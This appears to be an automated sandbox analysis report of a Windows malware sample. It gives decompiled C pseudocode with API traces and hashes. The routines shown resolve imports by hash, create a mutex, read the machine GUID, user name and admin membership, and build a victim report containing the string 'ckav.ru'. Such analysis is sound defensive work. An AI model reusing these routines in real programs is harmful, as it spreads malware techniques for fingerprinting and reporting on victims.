                        0x00404183
                        0x00404140

                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$AllocCreateReadVirtual
                        • String ID: .tmp
                        • API String ID: 3585551309-2986845003
                        • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                        • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                        • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                        • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E00413866(void* __eflags) {
                        				short _v6;
                        				short _v8;
                        				short _v10;
                        				short _v12;
                        				short _v14;
                        				short _v16;
                        				short _v18;
                        				short _v20;
                        				short _v22;
                        				char _v24;
                        				short _v28;
                        				short _v30;
                        				short _v32;
                        				short _v34;
                        				short _v36;
                        				short _v38;
                        				short _v40;
                        				short _v42;
                        				short _v44;
                        				short _v46;
                        				char _v48;
                        				short _v52;
                        				short _v54;
                        				short _v56;
                        				short _v58;
                        				short _v60;
                        				short _v62;
                        				short _v64;
                        				short _v66;
                        				short _v68;
                        				short _v70;
                        				short _v72;
                        				short _v74;
                        				char _v76;
                        				void* __ebx;
                        				void* __edi;
                        				void* _t38;
                        				short _t43;
                        				short _t44;
                        				short _t45;
                        				short _t46;
                        				short _t47;
                        				short _t48;
                        				short _t50;
                        				short _t51;
                        				short _t52;
                        				short _t54;
                        				short _t55;
                        				intOrPtr* _t57;
                        				intOrPtr* _t59;
                        				intOrPtr* _t61;
                        				void* _t63;
                        				WCHAR* _t65;
                        				long _t68;
                        				void* _t75;
                        				short _t76;
                        				short _t78;
                        				short _t83;
                        				short _t84;
                        				short _t85;
                        
                        				E00402C6C(_t38);
                        				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                        				SetErrorMode(3); // executed
                        				_t43 = 0x4f;
                        				_v76 = _t43;
                        				_t44 = 0x4c;
                        				_v74 = _t44;
                        				_t45 = 0x45;
                        				_v72 = _t45;
                        				_t46 = 0x41;
                        				_v70 = _t46;
                        				_t47 = 0x55;
                        				_v68 = _t47;
                        				_t48 = 0x54;
                        				_t76 = 0x33;
                        				_t84 = 0x32;
                        				_t83 = 0x2e;
                        				_t78 = 0x64;
                        				_t85 = 0x6c;
                        				_v66 = _t48;
                        				_v52 = 0;
                        				_t50 = 0x77;
                        				_v48 = _t50;
                        				_t51 = 0x73;
                        				_v46 = _t51;
                        				_t52 = 0x5f;
                        				_v42 = _t52;
                        				_v28 = 0;
                        				_t54 = 0x6f;
                        				_v24 = _t54;
                        				_t55 = 0x65;
                        				_v20 = _t55;
                        				_v64 = _t76;
                        				_v62 = _t84;
                        				_v60 = _t83;
                        				_v58 = _t78;
                        				_v56 = _t85;
                        				_v54 = _t85;
                        				_v44 = _t84;
                        				_v40 = _t76;
                        				_v38 = _t84;
                        				_v36 = _t83;
                        				_v34 = _t78;
                        				_v32 = _t85;
                        				_v30 = _t85;
                        				_v22 = _t85;
                        				_v18 = _t76;
                        				_v16 = _t84;
                        				_v14 = _t83;
                        				_v12 = _t78;
                        				_v10 = _t85;
                        				_v8 = _t85;
                        				_v6 = 0;
                        				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                        				 *_t57( &_v76);
                        				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                        				 *_t59( &_v48);
                        				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                        				_t81 =  &_v24;
                        				 *_t61( &_v24); // executed
                        				_t63 = E00414059(); // executed
                        				if(_t63 != 0) {
                        					_t65 = E00413D97(0);
                        					E004031E5(0, 0, 0xcf167df4, 0, 0);
                        					CreateMutexW(0, 1, _t65); // executed
                        					_t68 = GetLastError();
                        					_t92 = _t68 - 0xb7;
                        					if(_t68 == 0xb7) {
                        						E00413B81(0);
                        						_pop(_t81); // executed
                        					}
                        					E00413003(_t92); // executed
                        					E00412B2E(_t92); // executed
                        					E00412D31(_t81, _t84); // executed
                        					E00413B3F();
                        					E00413B81(0);
                        					 *0x49fdd0 = 1;
                        				}
                        				return 0;
                        			}































































                        0x0041386f
                        0x0041387e
                        0x00413885
                        0x00413889
                        0x0041388c
                        0x00413890
                        0x00413893
                        0x00413897
                        0x0041389a
                        0x0041389e
                        0x004138a1
                        0x004138a5
                        0x004138a8
                        0x004138ac
                        0x004138af
                        0x004138b2
                        0x004138b5
                        0x004138b8
                        0x004138bb
                        0x004138bc
                        0x004138c4
                        0x004138c8
                        0x004138cb
                        0x004138cf
                        0x004138d2
                        0x004138d6
                        0x004138d7
                        0x004138df
                        0x004138e3
                        0x004138e4
                        0x004138ea
                        0x004138eb
                        0x004138f1
                        0x004138f5
                        0x004138f9
                        0x004138fd
                        0x00413901
                        0x00413905
                        0x00413909
                        0x0041390d
                        0x00413911
                        0x00413915
                        0x00413919
                        0x0041391d
                        0x00413921
                        0x00413925
                        0x00413929
                        0x0041392d
                        0x00413931
                        0x00413935
                        0x00413939
                        0x0041393d
                        0x00413941
                        0x00413950
                        0x00413959
                        0x0041395f
                        0x00413968
                        0x0041396e
                        0x00413973
                        0x00413977
                        0x00413979
                        0x00413980
                        0x00413982
                        0x00413991
                        0x0041399c
                        0x0041399e
                        0x004139a4
                        0x004139a9
                        0x004139ac
                        0x004139b1
                        0x004139b1
                        0x004139b2
                        0x004139b7
                        0x004139bc
                        0x004139c1
                        0x004139c7
                        0x004139cd
                        0x004139cd
                        0x004139db

                        APIs
                        • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                        • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                        • GetLastError.KERNEL32 ref: 0041399E
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Error$CreateLastModeMutex
                        • String ID:
                        • API String ID: 3448925889-0
                        • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                        • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                        • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                        • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                        				long _v8;
                        				void* _t7;
                        				long _t10;
                        				void* _t21;
                        				struct _OVERLAPPED* _t24;
                        
                        				_t14 = __ebx;
                        				_t24 = 0;
                        				_v8 = 0;
                        				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                        				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                        				_t21 = _t7;
                        				if(_t21 != 0xffffffff) {
                        					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                        					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                        					if(_t10 != 0xffffffff) {
                        						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                        						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                        						_t24 =  !=  ? 1 : 0;
                        					}
                        					E00403C40(_t21); // executed
                        				}
                        				return _t24;
                        			}








                        0x004042cf
                        0x004042d5
                        0x004042df
                        0x004042e2
                        0x004042f9
                        0x004042fb
                        0x00404300
                        0x0040430a
                        0x00404314
                        0x00404319
                        0x00404323
                        0x00404334
                        0x0040433b
                        0x0040433b
                        0x0040433f
                        0x00404344
                        0x0040434c

                        APIs
                        • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                        • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreatePointerWrite
                        • String ID:
                        • API String ID: 3672724799-0
                        • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                        • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                        • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                        • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E00412D31(void* __ecx, void* __edi) {
                        				long _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				char _v40;
                        				void* __ebx;
                        				intOrPtr* _t10;
                        				void* _t11;
                        				void* _t25;
                        				void* _t26;
                        				void* _t27;
                        				void* _t35;
                        				void* _t53;
                        				char* _t57;
                        				void* _t58;
                        				void* _t61;
                        				void* _t64;
                        				void* _t65;
                        				intOrPtr* _t66;
                        				void* _t67;
                        				void* _t68;
                        				void* _t69;
                        				void* _t70;
                        				void* _t71;
                        				void* _t72;
                        				void* _t73;
                        
                        				_t53 = __ecx;
                        				_t10 =  *0x49fde0;
                        				_t68 = _t67 - 0x24;
                        				 *0x49fddc = 0x927c0;
                        				 *0x49fde4 = 0;
                        				_t75 = _t10;
                        				if(_t10 != 0) {
                        					L16:
                        					_push(1);
                        					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                        					_t61 = _t11;
                        					_t68 = _t68 + 0xc;
                        					if(_t61 != 0) {
                        						E004031E5(0, 0, 0xfcae4162, 0, 0);
                        						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                        					}
                        					L004067C4(0xea60); // executed
                        					_pop(_t53);
                        				} else {
                        					_push(__edi);
                        					 *0x49fde0 = E004056BF(0x2bc);
                        					E00413DB7(_t53, _t75,  &_v40);
                        					_t57 =  &_v24;
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					E004058D4( *0x49fde0, 0x12);
                        					E004058D4( *0x49fde0, 0x28);
                        					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                        					_t69 = _t68 + 0x28;
                        					_t64 = E0040632F();
                        					_push(0);
                        					_push(1);
                        					if(_t64 == 0) {
                        						_push(0);
                        						_push( *0x49fde0);
                        						E00405872();
                        						_t70 = _t69 + 0x10;
                        					} else {
                        						_push(_t64);
                        						_push( *0x49fde0);
                        						E00405872();
                        						E00402BAB(_t64);
                        						_t70 = _t69 + 0x14;
                        					}
                        					_t58 = E00406130(_t57);
                        					_push(0);
                        					_push(1);
                        					_t77 = _t64;
                        					if(_t64 == 0) {
                        						_push(0);
                        						_push( *0x49fde0);
                        						_t25 = E00405872();
                        						_t71 = _t70 + 0x10; // executed
                        					} else {
                        						_push(_t58);
                        						_push( *0x49fde0);
                        						E00405872();
                        						_t25 = E00402BAB(_t58);
                        						_t71 = _t70 + 0x14;
                        					}
                        					_t26 = E004061C3(_t25, 0, _t77); // executed
                        					_t65 = _t26;
                        					_push(0);
                        					_push(1);
                        					if(_t65 == 0) {
                        						_push(0);
                        						_push( *0x49fde0);
                        						_t27 = E00405872();
                        						_t72 = _t71 + 0x10;
                        					} else {
                        						_push(_t65);
                        						_push( *0x49fde0);
                        						E00405872();
                        						_t27 = E00402BAB(_t65);
                        						_t72 = _t71 + 0x14;
                        					}
                        					_t66 = E00406189(_t27);
                        					_t79 = _t66;
                        					if(_t66 == 0) {
                        						E00405781( *0x49fde0, 0);
                        						E00405781( *0x49fde0, 0);
                        						_t73 = _t72 + 0x10;
                        					} else {
                        						E00405781( *0x49fde0,  *_t66);
                        						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                        						E00402BAB(_t66);
                        						_t73 = _t72 + 0x14;
                        					}
                        					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                        					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                        					_t35 = E0040642C(_t79); // executed
                        					E004058D4( *0x49fde0, _t35);
                        					E004058D4( *0x49fde0, _v24);
                        					E004058D4( *0x49fde0, _v20);
                        					E004058D4( *0x49fde0, _v16);
                        					E004058D4( *0x49fde0, _v12);
                        					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                        					_t68 = _t73 + 0x48;
                        				}
                        				_t80 =  *0x49fde4;
                        				if( *0x49fde4 == 0) {
                        					_t10 =  *0x49fde0;
                        					goto L16;
                        				}
                        				return E00405695(_t53,  *0x49fde0);
                        			}






























                        0x00412d31
                        0x00412d34
                        0x00412d39
                        0x00412d3c
                        0x00412d49
                        0x00412d50
                        0x00412d52
                        0x00412f24
                        0x00412f24
                        0x00412f2b
                        0x00412f30
                        0x00412f32
                        0x00412f37
                        0x00412f41
                        0x00412f53
                        0x00412f53
                        0x00412f5b
                        0x00412f60
                        0x00412d58
                        0x00412d58
                        0x00412d63
                        0x00412d6c
                        0x00412d73
                        0x00412d7e
                        0x00412d7f
                        0x00412d80
                        0x00412d81
                        0x00412d82
                        0x00412d8f
                        0x00412da1
                        0x00412da6
                        0x00412dae
                        0x00412db0
                        0x00412db1
                        0x00412db5
                        0x00412dce
                        0x00412dcf
                        0x00412dd5
                        0x00412dda
                        0x00412db7
                        0x00412db7
                        0x00412db8
                        0x00412dbe
                        0x00412dc4
                        0x00412dc9
                        0x00412dc9
                        0x00412de2
                        0x00412de4
                        0x00412de5
                        0x00412de7
                        0x00412de9
                        0x00412e02
                        0x00412e03
                        0x00412e09
                        0x00412e0e
                        0x00412deb
                        0x00412deb
                        0x00412dec
                        0x00412df2
                        0x00412df8
                        0x00412dfd
                        0x00412dfd
                        0x00412e11
                        0x00412e17
                        0x00412e19
                        0x00412e1a
                        0x00412e1e
                        0x00412e37
                        0x00412e38
                        0x00412e3e
                        0x00412e43
                        0x00412e20
                        0x00412e20
                        0x00412e21
                        0x00412e27
                        0x00412e2d
                        0x00412e32
                        0x00412e32
                        0x00412e4b
                        0x00412e4d
                        0x00412e4f
                        0x00412e7e
                        0x00412e8a
                        0x00412e8f
                        0x00412e51
                        0x00412e59
                        0x00412e67
                        0x00412e6d
                        0x00412e72
                        0x00412e72
                        0x00412e9e
                        0x00412eaf
                        0x00412eb4
                        0x00412ec0
                        0x00412ece
                        0x00412edc
                        0x00412eea
                        0x00412ef8
                        0x00412f0f
                        0x00412f14
                        0x00412f14
                        0x00412f17
                        0x00412f1d
                        0x00412f1f
                        0x00000000
                        0x00412f1f
                        0x00412f74

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                          • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                          • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                          • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$CreateFreeProcessThread_wmemset
                        • String ID: ckav.ru
                        • API String ID: 2915393847-2696028687
                        • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                        • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                        • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                        • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040632F() {
                        				char _v8;
                        				void* _t4;
                        				void* _t7;
                        				void* _t16;
                        
                        				_t16 = E00402B7C(0x208);
                        				if(_t16 == 0) {
                        					L4:
                        					_t4 = 0;
                        				} else {
                        					E0040338C(_t16, 0, 0x104);
                        					_t1 =  &_v8; // 0x4143e8
                        					_v8 = 0x208;
                        					_t7 = E00406069(_t16, _t1); // executed
                        					if(_t7 == 0) {
                        						E00402BAB(_t16);
                        						goto L4;
                        					} else {
                        						_t4 = _t16;
                        					}
                        				}
                        				return _t4;
                        			}







                        0x00406340
                        0x00406345
                        0x00406373
                        0x00406373
                        0x00406347
                        0x0040634f
                        0x00406354
                        0x00406357
                        0x0040635c
                        0x00406366
                        0x0040636d
                        0x00000000
                        0x00406368
                        0x00406368
                        0x00406368
                        0x00406366
                        0x0040637a

                        APIs
                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        • _wmemset.LIBCMT ref: 0040634F
                          • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser_wmemset
                        • String ID: CA
                        • API String ID: 2078537776-1052703068
                        • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                        • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                        • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                        • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                        				int _t7;
                        				void* _t8;
                        
                        				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                        				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                        				return _t7;
                        			}





                        0x00406094
                        0x004060a8
                        0x004060ab

                        APIs
                        • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationToken
                        • String ID: IDA
                        • API String ID: 4114910276-365204570
                        • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                        • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                        • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                        • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                        				_Unknown_base(*)()* _t5;
                        				void* _t6;
                        
                        				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                        				_t1 =  &_a8; // 0x403173
                        				_t5 = GetProcAddress(_a4,  *_t1); // executed
                        				return _t5;
                        			}





                        0x00402c10
                        0x00402c15
                        0x00402c1b
                        0x00402c1e

                        APIs
                        • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc
                        • String ID: s1@
                        • API String ID: 190572456-427247929
                        • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                        • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                        • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                        • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E00404A52(void* _a4, char* _a8, char* _a12) {
                        				void* _v8;
                        				int _v12;
                        				void* __ebx;
                        				char* _t10;
                        				long _t13;
                        				char* _t27;
                        
                        				_push(_t21);
                        				_t27 = E00402B7C(0x208);
                        				if(_t27 == 0) {
                        					L4:
                        					_t10 = 0;
                        				} else {
                        					E00402B4E(_t27, 0, 0x208);
                        					_v12 = 0x208;
                        					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                        					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                        					if(_t13 != 0) {
                        						E00402BAB(_t27);
                        						goto L4;
                        					} else {
                        						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                        						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                        						E00404A39(_v8); // executed
                        						_t10 = _t27;
                        					}
                        				}
                        				return _t10;
                        			}









                        0x00404a56
                        0x00404a65
                        0x00404a6a
                        0x00404ad1
                        0x00404ad1
                        0x00404a6c
                        0x00404a71
                        0x00404a79
                        0x00404a85
                        0x00404a9a
                        0x00404a9e
                        0x00404acb
                        0x00000000
                        0x00404aa0
                        0x00404aac
                        0x00404abc
                        0x00404ac1
                        0x00404ac6
                        0x00404ac6
                        0x00404a9e
                        0x00404ad9

                        APIs
                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateOpenProcessQueryValue
                        • String ID:
                        • API String ID: 1425999871-0
                        • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                        • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                        • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                        • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 40%
                        			E004060BD(void* __eflags) {
                        				signed int _v8;
                        				char _v12;
                        				short _v16;
                        				char _v20;
                        				void* __ebx;
                        				intOrPtr* _t12;
                        				signed int _t13;
                        				intOrPtr* _t14;
                        				signed int _t15;
                        				void* _t24;
                        
                        				_v16 = 0x500;
                        				_v20 = 0;
                        				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                        				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                        				_v8 = _t13;
                        				if(_t13 != 0) {
                        					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                        					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                        					asm("sbb eax, eax");
                        					_v8 = _v8 &  ~_t15;
                        					E0040604F(_v12);
                        					return _v8;
                        				}
                        				return _t13;
                        			}













                        0x004060c6
                        0x004060d5
                        0x004060d8
                        0x004060f4
                        0x004060f6
                        0x004060fb
                        0x0040610a
                        0x00406115
                        0x0040611c
                        0x0040611e
                        0x00406121
                        0x00000000
                        0x0040612a
                        0x0040612f

                        APIs
                        • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                        Memory Dump Source
